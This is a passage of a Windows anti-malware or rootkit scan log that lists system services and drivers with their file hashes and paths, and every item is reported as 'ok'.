09:21:42.0316 0x0304  [ 8D6E10A2D9A5EED59562D9B82CF804E1, 888F9650F4E872BA8F4E0C27E38A6672A561042B17EBA40E306A22357965B0AD ] defragsvc       C:\Windows\System32\defragsvc.dll
09:21:42.0316 0x0304  defragsvc - ok
09:21:42.0362 0x0304  [ F024449C97EC1E464AAFFDA18593DB88, 7EF1E241892E098A472BCA14C724DFF1AACCF190954AF1C4A38B6D542CC74BD2 ] DfsC            C:\Windows\system32\Drivers\dfsc.sys
09:21:42.0362 0x0304  DfsC - ok
09:21:42.0399 0x0304  [ E9E01EB683C132F7FA27CD607B8A2B63, 4D9037B458C522874619143A4176BCED42472C68933E6E83D37B67242706F3C4 ] Dhcp            C:\Windows\system32\dhcpcore.dll
09:21:42.0399 0x0304  Dhcp - ok
09:21:42.0430 0x0304  [ 1A050B0274BFB3890703D490F330C0DA, 79D74F4679A2EE040FAAF4D0392A9311239A10A5F8A5CCB48656C6F89B6D62FB ] discache        C:\Windows\system32\drivers\discache.sys
09:21:42.0430 0x0304  discache - ok
09:21:42.0461 0x0304  [ 565003F326F99802E68CA78F2A68E9FF, ABC42B24DBA4FFC411120E09278EF26AF56CCAB463B69B4BD6C530B4A07063D2 ] Disk            C:\Windows\system32\DRIVERS\disk.sys
09:21:42.0461 0x0304  Disk - ok
09:21:42.0498 0x0304  [ 33EF4861F19A0736B11314AAD9AE28D0, 4C4B84365D85758E3263B88F157D8B086B392C6F1EA5F0F3DB6BF87EF90248EC ] Dnscache        C:\Windows\System32\dnsrslvr.dll
09:21:42.0498 0x0304  Dnscache - ok
09:21:42.0545 0x0304  [ 366BA8FB4B7BB7435E3B9EACB3843F67, 65B7C61ACF34F1F0149045AA9E09A3F917A927963237A385A914D0B80551DC31 ] dot3svc         C:\Windows\System32\dot3svc.dll
09:21:42.0545 0x0304  dot3svc - ok
09:21:42.0599 0x0304  [ 8EC04CA86F1D68DA9E11952EB85973D6, 2E3FBC2D683D1274E8BC45EEEA87D43B77EDDCAAF0D453296D9FDA6B9D717071 ] DPS             C:\Windows\system32\dps.dll
09:21:42.0599 0x0304  DPS - ok
09:21:42.0646 0x0304  [ B918E7C5F9BF77202F89E1A9539F2EB4, C589A37DE50BBEF22E2DAA9682EA43147F614AA1AF7DAAA942BA5FC192313A0B ] drmkaud         C:\Windows\system32\drivers\drmkaud.sys
09:21:42.0646 0x0304  drmkaud - ok
09:21:42.0698 0x0304  [ 3583A5A8CC2E682BFFBD4630D0FEC08B, FD0F184B358FCECAA763444B414074BEF4E871EB7527D88385519FC158435C72 ] DXGKrnl         C:\Windows\System32\drivers\dxgkrnl.sys
09:21:42.0698 0x0304  DXGKrnl - ok
09:21:42.0783 0x0304  [ 8EB9F47C76667CCF8A733751DABAF04B, E5311B5760201D955CFDB5F11AA6E0088C79411A5876D1A464687F93EFFE3061 ] e1kexpress      C:\Windows\system32\DRIVERS\e1k6232.sys
09:21:42.0799 0x0304  e1kexpress - ok
09:21:42.0830 0x0304  [ 8600142FA91C1B96367D3300AD0F3F3A, 5713625E27DF11FAAFDA7AC79899A6AD813166E167088FA990EC5DE87DBE83DF ] EapHost         C:\Windows\System32\eapsvc.dll
09:21:42.0830 0x0304  EapHost - ok
09:21:42.0945 0x0304  [ 024E1B5CAC09731E4D868E64DBFB4AB0, AB0826A74BBEE5B7A1B035861B665C79BC98305CFC7D82BEF420558FBD3EE994 ] ebdrv           C:\Windows\system32\DRIVERS\evbdx.sys
09:21:42.0983 0x0304  ebdrv - ok
09:21:43.0029 0x0304  [ DD17E1573651293D4ED31053795B3471, 94F7D1BB1C3B0C1FAAEED07375DB0F3BC995394FB5C26983548D946C8D229D54 ] EFS             C:\Windows\System32\lsass.exe
09:21:43.0029 0x0304  EFS - ok
09:21:43.0083 0x0304  [ A8C362018EFC87BEB013EE28F29C0863, 07971C681FBD391C0BA0172618AF8AD77520182207F1C57F134B34D6A113857F ] ehRecvr         C:\Windows\ehome\ehRecvr.exe
09:21:43.0099 0x0304  ehRecvr - ok
09:21:43.0114 0x0304  [ D389BFF34F80CAEDE417BF9D1507996A, 12859B9925D7A4631DE61A820922F43F56ED23C2AF014CBF36322685E5CF641E ] ehSched         C:\Windows\ehome\ehsched.exe
09:21:43.0130 0x0304  ehSched - ok
09:21:43.0161 0x0304  [ 0ED67910C8C326796FAA00B2BF6D9D3C, 97FAA7627A162B0AEC15545E0165D13355D535B4157604BB87F8EEB72ECD24A8 ] elxstor         C:\Windows\system32\DRIVERS\elxstor.sys
09:21:43.0182 0x0304  elxstor - ok
09:21:43.0232 0x0304  [ 6FD79878E320793FE8DADB5958D399AC, F849A5A0C4B60BAD3C5D25197DDE9731210FBAF19F5BC3B425450C27D4B792B9 ] EngineServer    C:\PROGRA~1\McAfee\MANAGE~1\VScan\ENGINE~1.EXE
09:21:43.0232 0x0304  EngineServer - ok
09:21:43.0263 0x0304  [ 8FC3208352DD3912C94367A206AB3F11, 69B65C12BDADD4B730508674B1B77C5496612B4ACCC447DB9AFE49ADEA8CBF02 ] ErrDev          C:\Windows\system32\drivers\errdev.sys
09:21:43.0263 0x0304  ErrDev - ok
09:21:43.0310 0x0304  [ F6916EFC29D9953D5D0DF06882AE8E16, ED41893960018D5EC2F7829B1DE4B6967D9FD074D60B11B9EB854E3E0948EC24 ] EventSystem     C:\Windows\system32\es.dll
09:21:43.0325 0x0304  EventSystem - ok
09:21:43.0341 0x0304  [ 2DC9108D74081149CC8B651D3A26207F, 75CB47923A867DDAC512701CE71DFCFC340FC3A2E27F4255D0836A1FBC463176 ] exfat           C:\Windows\system32\drivers\exfat.sys
09:21:43.0341 0x0304  exfat - ok
09:21:43.0380 0x0304  [ 7E0AB74553476622FB6AE36F73D97D35, 41463A255FDA1D550B3385EC7C73ABC343B1BBBE9CEE4DF9F2A8B3E7338C4947 ] fastfat         C:\Windows\system32\drivers\fastfat.sys
09:21:43.0382 0x0304  fastfat - ok
09:21:43.0431 0x0304  [ 967EA5B213E9984CBE270205DF37755B, 43153E23210B03FAE16897D62D55B8742F834EDC695F8401EAB5DE307F62602D ] Fax             C:\Windows\system32\fxssvc.exe
09:21:43.0447 0x0304  Fax - ok
09:21:43.0447 0x0304  [ E817A017F82DF2A1F8CFDBDA29388B29, 4CC9320A21E6FEA2D16C48D6BEA14391B695BD541A3C5FDDAEEE086A414FC837 ] fdc             C:\Windows\system32\DRIVERS\fdc.sys
09:21:43.0447 0x0304  fdc - ok
09:21:43.0480 0x0304  [ F3222C893BD2F5821A0179E5C71E88FB, A85B947249DBB986358CCD4B158DD58A9301F074F3C6CCCDEF2D01F432E59D1B ] fdPHost         C:\Windows\system32\fdPHost.dll
09:21:43.0481 0x0304  fdPHost - ok
09:21:43.0488 0x0304  [ 7DBE8CBFE79EFBDEB98C9FB08D3A9A5B, 0E76C29D2A974A3F2FBFCB63D066D4136B78E02F6B1F579B1865CA7A76193987 ] FDResPub        C:\Windows\system32\fdrespub.dll
09:21:43.0490 0x0304  FDResPub - ok
09:21:43.0499 0x0304  [ 6CF00369C97F3CF563BE99BE983D13D8, F65F35324A2FB9DFB533B1C4D089D990CC242218FE83414329D07B786D8EFF33 ] FileInfo        C:\Windows\system32\drivers\fileinfo.sys
09:21:43.0515 0x0304  FileInfo - ok
09:21:43.0515 0x0304  [ 42C51DC94C91DA21CB9196EB64C45DB9, 388C68D12ECC8FFE3116FEAAF4DB7B80CF4A3F97E935788DD21C6ADE2369F635 ] Filetrace       C:\Windows\system32\drivers\filetrace.sys
09:21:43.0515 0x0304  Filetrace - ok
09:21:43.0530 0x0304  [ 87907AA70CB3C56600F1C2FB8841579B, CA1CD82A1CD453617CE5EA431A1836997F14E3580554E8A516D9FE1E9926D979 ] flpydisk        C:\Windows\system32\DRIVERS\flpydisk.sys
09:21:43.0530 0x0304  flpydisk - ok
09:21:43.0561 0x0304  [ 7520EC808E0C35E0EE6F841294316653, 6EC65511B4838A7172A8F89E35C2F9DF4F0BFCE3BE12EDA790F3EB567102FF67 ] FltMgr          C:\Windows\system32\drivers\fltmgr.sys
09:21:43.0561 0x0304  FltMgr - ok
09:21:43.0614 0x0304  [ E12C4928B32ACE04610259647F072635, B71B9C2DF45F33C4DAC88435129B08B0BCDBBE82E8C3AD0A95F00137CC8B619F ] FontCache       C:\Windows\system32\FntCache.dll
09:21:43.0630 0x0304  FontCache - ok
09:21:43.0680 0x0304  [ E56F39F6B7FDA0AC77A79B0FD3DE1A2F, DBED26852B99B362152DA9CD4F31A1883EF6F9B496F3CF3772A197BA72DB61DA ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
09:21:43.0680 0x0304  FontCache3.0.0.0 - ok
09:21:43.0683 0x0304  [ 1A16B57943853E598CFF37FE2B8CBF1D, 87609F46F3B8123552141FD70866E895220B1BBD92BC2B580CAF49201AA0197E ] FsDepends       C:\Windows\system32\drivers\FsDepends.sys
09:21:43.0683 0x0304  FsDepends - ok
09:21:43.0714 0x0304  [ 7DAE5EBCC80E45D3253F4923DC424D05, 8A2C4D5591509B0B0A44583520617A9AE34F32BB6E68A012A7D7870ED24F703A ] Fs_Rec          C:\Windows\system32\drivers\Fs_Rec.sys
09:21:43.0714 0x0304  Fs_Rec - ok
09:21:43.0799 0x0304  [ E306A24D9694C724FA2491278BF50FDB, 1D246B9C28550640EACBF8CF9DC980FD75106B92832D392FEBEF0C7012353091 ] fvevol          C:\Windows\system32\DRIVERS\fvevol.sys
09:21:43.0799 0x0304  fvevol - ok
09:21:43.0861 0x0304  [ 65EE0C7A58B65E74AE05637418153938, 0E1A398ADD8411AF4CCC3344D67BE1B261320C58328BD5C5855A357476FAEBEF ] gagp30kx        C:\Windows\system32\DRIVERS\gagp30kx.sys
09:21:43.0877 0x0304  gagp30kx - ok
09:21:43.0916 0x0304  [ E897EAF5ED6BA41E081060C9B447A673, A428DC68516F19C6C53A8B62E4BDB2587E70FB751B9D77700B6B147D347DA157 ] gpsvc           C:\Windows\System32\gpsvc.dll
09:21:43.0916 0x0304  gpsvc - ok
09:21:43.0983 0x0304  [ 51508F0C2476177E50C31B0BBFBF1BDB, 3F62A05181D54711180C8727AC66D624AFA7FC816A4ACC4DC0CFCF2D2DBE7F87 ] gupdate         C:\Program Files\Google\Update\GoogleUpdate.exe
09:21:43.0983 0x0304  gupdate - ok
09:21:44.0014 0x0304  [ 51508F0C2476177E50C31B0BBFBF1BDB, 3F62A05181D54711180C8727AC66D624AFA7FC816A4ACC4DC0CFCF2D2DBE7F87 ] gupdatem        C:\Program Files\Google\Update\GoogleUpdate.exe
09:21:44.0014 0x0304  gupdatem - ok
09:21:44.0079 0x0304  [ 5D4BC124FAAE6730AC002CDB67BF1A1C, 00294F4DC7D17F6DD2A22B9C3299BED40146BA45C972367154D20DB502472551 ] gusvc           C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
09:21:44.0082 0x0304  gusvc - ok
09:21:44.0101 0x0304  [ C44E3C2BAB6837DB337DDEE7544736DB, 88A24FF7D2FECCEAFFD421B2039A0FB623DA47A6B220B80EF1E52DD26D9E222D ] hcw85cir        C:\Windows\system32\drivers\hcw85cir.sys
09:21:44.0101 0x0304  hcw85cir - ok
09:21:44.0148 0x0304  [ A5EF29D5315111C80A5C1ABAD14C8972, A181DA72E946F121C3F4A19438C547B0BFD15138AB1DB5465945EC89DF1F6B0A ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
09:21:44.0167 0x0304  HdAudAddService - ok
09:21:44.0199 0x0304  [ 9036377B8A6C15DC2EEC53E489D159B5, 1E56D2ACFE92E6DF96D755B05C63D580EED82C210F075C8623E138BEE6BCD41B ] HDAudBus        C:\Windows\system32\drivers\HDAudBus.sys
09:21:44.0199 0x0304  HDAudBus - ok
09:21:44.0215 0x0304  [ 88A67C34E37186665E916FD347B50D19, 23C4F11E421DE7D8330418118524D345A905300816E3D7D486DB18C670226EE1 ] HECI            C:\Windows\system32\DRIVERS\HECI.sys
09:21:44.0215 0x0304  HECI - ok
09:21:44.0246 0x0304  [ 1D58A7F3E11A9731D0EAAAA8405ACC36, 7056FA18B86FBD52C4A6092D80476C02553EA053D6A0BEDB01A2FA5E152D5215 ] HidBatt         C:\Windows\system32\DRIVERS\HidBatt.sys
09:21:44.0246 0x0304  HidBatt - ok
09:21:44.0261 0x0304  [ 89448F40E6DF260C206A193A4683BA78, 71E0FCC32AE6FF8DFF420DB0383D6A200E1EAE14BD2E32453F92CE18B31C1F3C ] HidBth          C:\Windows\system32\DRIVERS\hidbth.sys
09:21:44.0261 0x0304  HidBth - ok
09:21:44.0279 0x0304  [ CF50B4CF4A4F229B9F3C08351F99CA5E, B97843620AF80FF0EC8F2C438255C0A42A756C6314FAF3DEF415DE16E14C108F ] HidIr           C:\Windows\system32\DRIVERS\hidir.sys
09:21:44.0279 0x0304  HidIr - ok
09:21:44.0283 0x0304  [ 2BC6F6A1992B3A77F5F41432CA6B3B6B, 2AF3312F1C8C8923C0A29AA5DAE57CE269417E53DEA2F0CCCC8DB57029698FE1 ] hidserv         C:\Windows\System32\hidserv.dll
09:21:44.0299 0x0304  hidserv - ok
09:21:44.0330 0x0304  [ 10C19F8290891AF023EAEC0832E1EB4D, E208553029488A6EE2F5216CC9FE5F93E9931A94C0D0625253BB159E30642853 ] HidUsb          C:\Windows\system32\drivers\hidusb.sys
09:21:44.0330 0x0304  HidUsb - ok
09:21:44.0361 0x0304  [ 196B4E3F4CCCC24AF836CE58FACBB699, 7A2E1F603A073421FA0987EFB96647F1F0F2D4E0C82AA62EBC041585DA811DAF ] hkmsvc          C:\Windows\system32\kmsvc.dll
09:21:44.0361 0x0304  hkmsvc - ok
09:21:44.0377 0x0304  [ 6658F4404DE03D75FE3BA09F7ABA6A30, E51D9C1580A283EB862F09B73AAE1B647DD683A53F3DD99834222F12DD15E40F ] HomeGroupListener C:\Windows\system32\ListSvc.dll
09:21:44.0377 0x0304  HomeGroupListener - ok
09:21:44.0423 0x0304  [ DBC02D918FFF1CAD628ACBE0C0EAA8E8, 02121800D9062692C102475876AE8143EBE46D855E8328B8CDCFE6A2F0D19696 ] HomeGroupProvider C:\Windows\system32\provsvc.dll
09:21:44.0423 0x0304  HomeGroupProvider - ok
09:21:44.0499 0x0304  [ 2A8B93A01621E100A578E83C768AFA2C, 6637D260AF180D1F200D219796FCE6D524FC6BF57C0CEEF9E1B3616E85865AD1 ] HP Support Assistant Service C:\Program Files\Hewlett-Packard\HP Support Framework\hpsa_service.exe
09:21:44.0499 0x0304  HP Support Assistant Service - ok
09:21:44.0561 0x0304  [ D2946D9F020AE76E9CEF9B4A6DF838C0, C29CE594879385DA12B8EAA90B258905827B613839CCD820DE49215B68676995 ] hpqwmiex        C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
09:21:44.0586 0x0304  hpqwmiex - ok
09:21:44.0637 0x0304  [ 295FDC419039090EB8B49FFDBB374549, 670E8015FD374640C6570F56F7FE8DE4D8F92E7A8072F5D1B2B95D0BD699CEF7 ] HpSAMD          C:\Windows\system32\drivers\HpSAMD.sys
09:21:44.0639 0x0304  HpSAMD - ok
09:21:44.0690 0x0304  [ 871917B07A141BFF43D76D8844D48106, 30C702008D0EE57D63F74864967DD19A55A268E77E42B5B3CC73037AD51D2987 ] HTTP            C:\Windows\system32\drivers\HTTP.sys
09:21:44.0703 0x0304  HTTP - ok
09:21:44.0753 0x0304  [ 0C4E035C7F105F1299258C90886C64C5, CFB4FBE7B28058E6D3E6E508CF3C1645F6AAE0AFEB4C5364835B9C42311DF0D4 ] hwpolicy        C:\Windows\system32\drivers\hwpolicy.sys
09:21:44.0754 0x0304  hwpolicy - ok
09:21:44.0804 0x0304  [ F151F0BDC47F4A28B1B20A0818EA36D6, 84B24B5796D9F70A8C37773F5484A4606CC7908370CCD942627ACBEDC4952D79 ] i8042prt        C:\Windows\system32\drivers\i8042prt.sys
09:21:44.0806 0x0304  i8042prt - ok
09:21:44.0852 0x0304  [ D483687EACE0C065EE772481A96E05F5, A22200E90C78DFE73FE0FBEED5331AB43CD7133651FD125595C4DB604AD71B29 ] iaStor          C:\Windows\system32\drivers\iastor.sys
09:21:44.0858 0x0304  iaStor - ok
09:21:44.0884 0x0304  [ 5CD5F9A5444E6CDCB0AC89BD62D8B76E, 72870092A80C6DAE0105025B0ED8B607E98BA81E59298364A7FE4C9C56C68FF0 ] iaStorV         C:\Windows\system32\drivers\iaStorV.sys
09:21:44.0886 0x0304  iaStorV - ok
09:21:44.0946 0x0304  [ 3E9213A2A050BF429E91898C90F8B4E3, D80ABE5691087661B19F01927B631CB8C5291120B814B6F863F046E0D643E9E4 ] idsvc           C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
09:21:44.0959 0x0304  idsvc - ok
09:21:44.0983 0x0304  IEEtwCollectorService - ok
09:21:45.0245 0x0304  [ 8266AE06DF974E5BA047B3E9E9E70B3F, 44E5A8EED802A1DDF3CCDB478A88A3AB3CF009F449FB11E0F94A28498342B4E2 ] igfx            C:\Windows\system32\DRIVERS\igdkmd32.sys
09:21:45.0383 0x0304  igfx - ok
09:21:45.0448 0x0304  [ 4173FF5708F3236CF25195FECD742915, 0A9C0701DF6EAC6602BE342FC13C7950EF04BB5BDF7D96C2C5DABBD2A29AA55D ] iirsp           C:\Windows\system32\DRIVERS\iirsp.sys
09:21:45.0449 0x0304  iirsp - ok
09:21:45.0502 0x0304  [ B9C54120F46392100478F58F374E5709, A28EE8B0988F580D5984E815FC78DF41B169260814234AA0E453375542D0957B ] IKEEXT          C:\Windows\System32\ikeext.dll
09:21:45.0509 0x0304  IKEEXT - ok
09:21:45.0605 0x0304  [ D0A6C0CEB3B74A91884F804FF4F031C0, 86F1839A466A745FBB0607949C5715E441F4296F610A8E44DB6AD2F104F3A38C ] IntcAzAudAddService C:\Windows\system32\drivers\RTKVHDA.sys
09:21:45.0636 0x0304  IntcAzAudAddService - ok
09:21:45.0683 0x0304  [ A0F12F2C9BA6C72F3987CE780E77C130, 5F53DF8BE1621AA7DFB655CFD9C95E0AFA1AD3CE2E290E19D7B7FB3C6E380034 ] intelide        C:\Windows\system32\drivers\intelide.sys
09:21:45.0683 0x0304  intelide - ok
09:21:45.0714 0x0304  [ 3B514D27BFC4ACCB4037BC6685F766E0, F12D7AC62F8550E6F33B28AD751D8413AB7FFEF963242D99FFA76CE8A48B027A ] intelppm        C:\Windows\system32\DRIVERS\intelppm.sys
09:21:45.0714 0x0304  intelppm - ok
09:21:45.0783 0x0304  [ ACB364B9075A45C0736E5C47BE5CAE19, 202F77C659103D2D0E787B8CB0A23BE32EA5AA2E6B3B0A0F0A8DFA906AB3C0C0 ] IPBusEnum       C:\Windows\system32\ipbusenum.dll
09:21:45.0783 0x0304  IPBusEnum - ok
09:21:45.0798 0x0304  [ 709D1761D3B19A932FF0238EA6D50200, 0A9D2C3A6E91CA45540555B40CB4E2DF3EBE98C1D164C4EECEE20C86782F5823 ] IpFilterDriver  C:\Windows\system32\DRIVERS\ipfltdrv.sys
09:21:45.0798 0x0304  IpFilterDriver - ok
09:21:45.0845 0x0304  [ 58F67245D041FBE7AF88F4EAF79DF0FA, 67468D6A46FF4D87AD321BFEA42F2FC843D09AA292A119C76D4D795D06028F96 ] iphlpsvc        C:\Windows\System32\iphlpsvc.dll
09:21:45.0845 0x0304  iphlpsvc - ok
09:21:45.0882 0x0304  [ 4BD7134618C1D2A27466A099062547BF, 20284ABEF4433A59E2981F4143CAEC67DC990864FE0B9E3DC70EE0B88539E964 ] IPMIDRV         C:\Windows\system32\drivers\IPMIDrv.sys
09:21:45.0882 0x0304  IPMIDRV - ok
09:21:45.0898 0x0304  [ A5FA468D67ABCDAA36264E463A7BB0CD, EDB828D596E43372F97DAE1AADA46428C4C45FB80646DDC64FAD5F25C826CF63 ] IPNAT           C:\Windows\system32\drivers\ipnat.sys
09:21:45.0898 0x0304  IPNAT - ok
09:21:45.0914 0x0304  [ 42996CFF20A3084A56017B7902307E9F, 688176DAB91BE569280E4822E4C5BDE755794D293591C53F8047AD59C441751D ] IRENUM          C:\Windows\system32\drivers\irenum.sys
09:21:45.0929 0x0304  IRENUM - ok
09:21:45.0929 0x0304  [ 1F32BB6B38F62F7DF1A7AB7292638A35, 86522358680FBB1CEBC56B4D139290689BB0F71A3EC78CE883E4D75D0B37586F ] isapnp          C:\Windows\system32\drivers\isapnp.sys
09:21:45.0929 0x0304  isapnp - ok
09:21:45.0960 0x0304  [ EB34CE31FABD4DC4343FD2AD16D2CAF9, D21C91227A15DA89ECF522345D0AB80B3B7FC24A230596DABDB8BD3B7554CE8C ] iScsiPrt        C:\Windows\system32\drivers\msiscsi.sys
09:21:45.0978 0x0304  iScsiPrt - ok
09:21:45.0999 0x0304  [ 213822072085B5BBAD9AF30AB577D817, 2C373B804D840933EC3A5F3ABFC43E47C2636CDB2431AB51846C565077B7C468 ] IviRegMgr       C:\Program Files\Common Files\InterVideo\RegMgr\iviRegMgr.exe
09:21:46.0014 0x0304  IviRegMgr - ok
09:21:46.0030 0x0304  [ ADEF52CA1AEAE82B50DF86B56413107E, A3AE1E96B04AC81665ABBD3CB267DFB3F78376DAE18FB0DBD447908DDAAA22D2 ] kbdclass        C:\Windows\system32\drivers\kbdclass.sys
09:21:46.0030 0x0304  kbdclass - ok
09:21:46.0077 0x0304  [ 9E3CED91863E6EE98C24794D05E27A71, 90CF59F20E14E4A5A793266805E82BF7AE1F0CF4C7BAB1FD2EEF3B53C5DF770F ] kbdhid          C:\Windows\system32\drivers\kbdhid.sys
09:21:46.0077 0x0304  kbdhid - ok
09:21:46.0084 0x0304  [ DD17E1573651293D4ED31053795B3471, 94F7D1BB1C3B0C1FAAEED07375DB0F3BC995394FB5C26983548D946C8D229D54 ] KeyIso          C:\Windows\system32\lsass.exe
09:21:46.0084 0x0304  KeyIso - ok
09:21:46.0115 0x0304  [ 4120DA10AA42A9996F4575DB9E3E6E6E, 1C6E790772EA327ACB885D731A030408160534997DD56FEE4D6CEE6929873BB8 ] KSecDD          C:\Windows\system32\Drivers\ksecdd.sys
09:21:46.0115 0x0304  KSecDD - ok
09:21:46.0130 0x0304  [ D3964885F0A11ACF51DA3AAA776973B2, 417ED5A3201FC50FBC0D646F8F2114A1E8A91E7919A62508DCBC156C0BFB2FBA ] KSecPkg         C:\Windows\system32\Drivers\ksecpkg.sys
09:21:46.0130 0x0304  KSecPkg - ok
09:21:46.0162 0x0304  [ 89A7B9CC98D0D80C6F31B91C0A310FCD, 4583CAEEE0D50C0C7CE955E533FDA063CDC37B69033D41EF22EF1BA242E4C747 ] KtmRm           C:\Windows\system32\msdtckrm.dll
09:21:46.0162 0x0304  KtmRm - ok
09:21:46.0184 0x0304  [ D64AF876D53ECA3668BB97B51B4E70AB, D5C07C019BFEAFBEDC29AB5060356A3B07449712B21B50E03378BEF04AF180F9 ] LanmanServer    C:\Windows\System32\srvsvc.dll
09:21:46.0184 0x0304  LanmanServer - ok
09:21:46.0231 0x0304  [ 58405E4F68BA8E4057C6E914F326ABA2, C3E6519A1A38F1B3597D4391E42ABFE8F1F5E86256C4B3BD876CDAD9BB68B0A6 ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
09:21:46.0231 0x0304  LanmanWorkstation - ok
09:21:46.0262 0x0304  [ F7611EC07349979DA9B0AE1F18CCC7A6, 879AA7A391966F00761CA039C25EBC62F6712DD5461694911EEC673E12DE103E ] lltdio          C:\Windows\system32\DRIVERS\lltdio.sys
09:21:46.0262 0x0304  lltdio - ok
09:21:46.0293 0x0304  [ 5700673E13A2117FA3B9020C852C01E2, 6684A2905EE8C438F2A64BE47E51A54D287B08DEFB8E0AE7FC2809D845EE3C5F ] lltdsvc         C:\Windows\System32\lltdsvc.dll
09:21:46.0309 0x0304  lltdsvc - ok
09:21:46.0325 0x0304  [ 55CA01BA19D0006C8F2639B6C045E08B, 4DBBDC820C514DB18CC13F8EE178F8C4E39C295C6E3C255416C235553CE7BDC1 ] lmhosts         C:\Windows\System32\lmhsvc.dll
09:21:46.0325 0x0304  lmhosts - ok
09:21:46.0356 0x0304  [ 2763A02188FFB04287F5034EC5B6B451, 679C9316FC101A9135D788BC3D910F3EF4146AF56D97143149D1767F581535F7 ] LMS             C:\Program Files\Intel\AMT\LMS.exe
09:21:46.0356 0x0304  LMS - ok
09:21:46.0382 0x0304  [ EB119A53CCF2ACC000AC71B065B78FEF, 1FD60735C4945AE565C223F0B47EAF9602D8777E3D15600914C1A9D761215AF9 ] LSI_FC          C:\Windows\system32\DRIVERS\lsi_fc.sys
09:21:46.0384 0x0304  LSI_FC - ok
09:21:46.0400 0x0304  [ 8ADE1C877256A22E49B75D1CC9161F9C, 3D64F233DC866537E50549A7C1A2B40A954055B22F0BDA39825B04C38C607CB7 ] LSI_SAS         C:\Windows\system32\DRIVERS\lsi_sas.sys
09:21:46.0400 0x0304  LSI_SAS - ok
09:21:46.0416 0x0304  [ DC9DC3D3DAA0E276FD2EC262E38B11E9, A264990857CBC74036799E17A087130626C0A09BE19879019BAF2D761C62AECC ] LSI_SAS2        C:\Windows\system32\DRIVERS\lsi_sas2.sys
09:21:46.0416 0x0304  LSI_SAS2 - ok
09:21:46.0431 0x0304  [ 0A036C7D7CAB643A7F07135AC47E0524, 2F662D07FCB74B8D493156DB555EAA90A47E93CF14C7B30039D2FE47EB8682B8 ] LSI_SCSI        C:\Windows\system32\DRIVERS\lsi_scsi.sys
09:21:46.0431 0x0304  LSI_SCSI - ok
09:21:46.0462 0x0304  [ 6703E366CC18D3B6E534F5CF7DF39CEE, 7396B9AF938284D99EC51206A7B2FA4A0DC10A493DCE6707818B03A7473782C4 ] luafv           C:\Windows\system32\drivers\luafv.sys
09:21:46.0462 0x0304  luafv - ok
09:21:46.0515 0x0304  [ 8E2E9CCD873ABF180F48BCAEEEBE347D, 35DBBB8E63B480151EA5701D9DB7C90642FA2391D044DB400D3644F3E21BB0C1 ] MBAMSwissArmy   C:\Windows\system32\drivers\MBAMSwissArmy.sys
09:21:46.0515 0x0304  MBAMSwissArmy - ok
09:21:46.0546 0x0304  [ 823746F78213054E90AB2FFB316D9925, FAD5188855D43C7EF457E193A28BF2A5F87EF442156C2F8059EC9DD44EF78FBF ] McShield        C:\PROGRA~1\McAfee\MANAGE~1\VScan\McShield.exe
09:21:46.0546 0x0304  McShield - ok
09:21:46.0583 0x0304  [ BFB9EE8EE977EFE85D1A3105ABEF6DD1, D2A84EBF0C0B7A14AD432FD2EF43CC12300027AEA3FA4075659FB088AB62B588 ] Mcx2Svc         C:\Windows\system32\Mcx2Svc.dll
09:21:46.0599 0x0304  Mcx2Svc - ok
09:21:46.0614 0x0304  [ 0FFF5B045293002AB38EB1FD1FC2FB74, 49071B565FD5B2DE43EC00D8518C3BE70843F38919E82F13104B8C1FAFB20374 ] megasas         C:\Windows\system32\DRIVERS\megasas.sys
09:21:46.0614 0x0304  megasas - ok
09:21:46.0630 0x0304  [ DCBAB2920C75F390CAF1D29F675D03D6, 85C3A7A010BEA5E3C6179161B295F2CB900A6A214833A5F87A4327392880E2BB ] MegaSR          C:\Windows\system32\DRIVERS\MegaSR.sys
09:21:46.0645 0x0304  MegaSR - ok
09:21:46.0678 0x0304  [ 64B96DE8C492BD435372D9130A535F1D, B253682F140CD548489AE6CD2EC281C382E8D3C4C3BE9A423DFEB963E37D665C ] MfeAVFK         C:\Windows\system32\drivers\MfeAVFK.sys
09:21:46.0680 0x0304  MfeAVFK - ok
09:21:46.0683 0x0304  [ 078E87A89D36CC3516F19D5FB518BDDC, 09C80B948D638D67805EA21CFC9C8FE29685BBDE167385248CD763F9E1C9A1F4 ] MfeBOPK         C:\Windows\system32\drivers\MfeBOPK.sys
09:21:46.0683 0x0304  MfeBOPK - ok
09:21:46.0698 0x0304  [ 168C565101FD5B9DB694EFDEC91FAFA9, 1F7E469BDE079C85EE6CB6F02423E4F93C5FE373BDEA5CCD62173AA31934AFB4 ] mfehidk         C:\Windows\system32\drivers\mfehidk.sys
09:21:46.0714 0x0304  mfehidk - ok
09:21:46.0714 0x0304  [ E0842F67DC9BC4D21D1E319610EBE9E5, 7FEBA23EDA99D092775AE8F41AE0B5812C6C6CB95DAB387FF5845FE6113B1E40 ] MfeRKDK         C:\Windows\system32\drivers\MfeRKDK.sys
09:21:46.0729 0x0304  MfeRKDK - ok
09:21:46.0783 0x0304  [ 43A7ACBBD70ECD62F0B63486C72089A3, 2A50971FF6C42A63857B5972E4CF01E9632A5B7E3149A395446F9CB72A19C987 ] mfetdik         C:\Windows\system32\drivers\mfetdik.sys
09:21:46.0783 0x0304  mfetdik - ok
09:21:46.0799 0x0304  [ 146B6F43A673379A3C670E86D89BE5EA, C4412DCF80DE6B55466F399413271364F14BC0819C224AA161EDDC31A9775440 ] MMCSS           C:\Windows\system32\mmcss.dll
09:21:46.0799 0x0304  MMCSS - ok
09:21:46.0814 0x0304  [ F001861E5700EE84E2D4E52C712F4964, F4DC5AEED6F34D76CCEF360862CC47EF71097BE0813C8CE04EE5F0DB387DFFAE ] Modem           C:\Windows\system32\drivers\modem.sys
09:21:46.0830 0x0304  Modem - ok
09:21:46.0846 0x0304  [ 79D10964DE86B292320E9DFE02282A23, 52714827B7EEDACA55326A4E4F6158D4942DFAA3BACDE303A2F569BF3F4FAA72 ] monitor         C:\Windows\system32\DRIVERS\monitor.sys
09:21:46.0846 0x0304  monitor - ok
09:21:46.0881 0x0304  [ FB18CC1D4C2E716B6B903B0AC0CC0609, F10CCA63493782B16DE6B96B94A27078DBE68AECEF34FDF840CFF86D2C6E3C5E ] mouclass        C:\Windows\system32\drivers\mouclass.sys
09:21:46.0882 0x0304  mouclass - ok
